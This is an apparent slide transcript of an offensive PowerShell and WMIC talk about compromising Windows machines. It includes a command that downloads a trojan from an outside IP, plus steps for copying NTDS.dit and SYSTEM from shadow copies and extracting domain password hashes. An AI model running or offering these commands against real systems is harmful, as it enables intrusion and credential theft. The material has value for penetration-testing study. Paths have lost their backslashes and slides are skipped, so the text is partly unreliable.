This encompasses different techniques employed by leveraging powershell and attacking the systems in different ways. It is an interesting agglomeration of combined methods in plundering a windows box
3. Powershell Fundamentals
PowerShell is a command-line and scripting
language framework for task automation and
configuration management. For the Windows pen
tester of today, it's a comprehensive and powerful
tool in your arsenal that just so happens to be
installed on all of your victim PCs.
4. What is Powershell?
When I described PowerShell as a task automation and
configuration management framework, that's more along
the lines of Microsoft's definition of PowerShell. As
hackers, we think of what things can do, not necessarily
how their creators defined them; in that sense, PowerShell
is the Windows command line on steroids.
5. Powershell Cmdlets
A cmdlet is really just a command, at least conceptually;
behind the scenes, they're .NET classes for implementing
particular functionality. They're the native body of
commands within PowerShell and they use a unique self-
explanatory syntax style: Verb-Noun.
7. ICMP Enum
So, you have your foothold on a Windows box. Setting
aside the possibility of uploading our own tools, can we use
a plain off-the-shelf copy of Windows to poke around for a
potential next stepping stone? With PowerShell, there isn't
much we can't do.
12. Delivering a Trojan to your target via
PowerShell
> (New-Object
System.Net.WebClient).DownloadFile("http://192.16
8.63.143/attack1.exe",
"c:windowstempattack1.exe")
13. Named pipes and security
Concepts
The named pipe concept gives the pipe a name, and by having
a name, it utilizes the filesystem so that interaction with it is like
interacting with a file. Remember the purpose of our pipelines, to
take the output of a command and pipe it as input to another
command.
14. named pipes, although they work a lot like files, cannot
actually be mounted in the filesystem. They have their own
filesystem and are referenced with .pipe[name]. There
are functions available to the software developer to work
with named pipes (for example CreateFile, WriteFile, and
CloseHandle)
15.
16. WMIC
WMIC is the name of a tool and it stands for
Windows Management Instrumentation Command.
17. The tool allows us to perform WMI operations. WMI
is the Windows infrastructure for operations and
management data. In addition to providing
management data to other parts of Windows and
other products altogether, it's possible to automate
administrative tasks both locally and remotely with
WMI scripts and applications
18. WMIC commands fired off at the command line leave no
traces of software or code lying around. While WMI
activity can be logged, many organizations fail to turn it
on or review the logs.
In almost any Windows environment, WMI and
PowerShell can't be blocked.
25. The NTDS database is stored in the NTDS
directory under Windows, and you'll find
SYSTEM inside the system32config folder.
26. Creating a copy of the shadow file to
retrieve by the attacking box
> copy
?GLOBALROOTDeviceHarddiskVolumeShadowCopy1
WindowsNTDSNTDS.dit c:
> copy
?GLOBALROOTDeviceHarddiskVolumeShadowCo
py1Windowssystem32configSYSTEM c:
28. Mount the filesystem to the
attacking box
mount -t cifs //<IP>/C$ -o username=Administrator
/root/mount/
29. Password hash extraction with libesedb and
ntdsxtract
# git clone https://github.com/libyal/libesedb
# git clone https://github.com/csababarta/ntdsxtract
# cd libesedb
# apt-get install git autoconf automake autopoint libtool pkg-config build-
essentia
l# ./synclibs.sh
# ./autogen.sh
# chmod +x configure
# ./configure
# make
# make install
# ldconfig
30. Exporting all the tables from
NTDS database
# esedbexport -m tables ntds.dit
31. Where’s the hash?
We can pass the data table and link table to the dsusers
Python script, along with the location of the SYSTEM hive
(which contains the SYSKEY), and ask the script to nicely
format our hashes into a cracker-friendly format: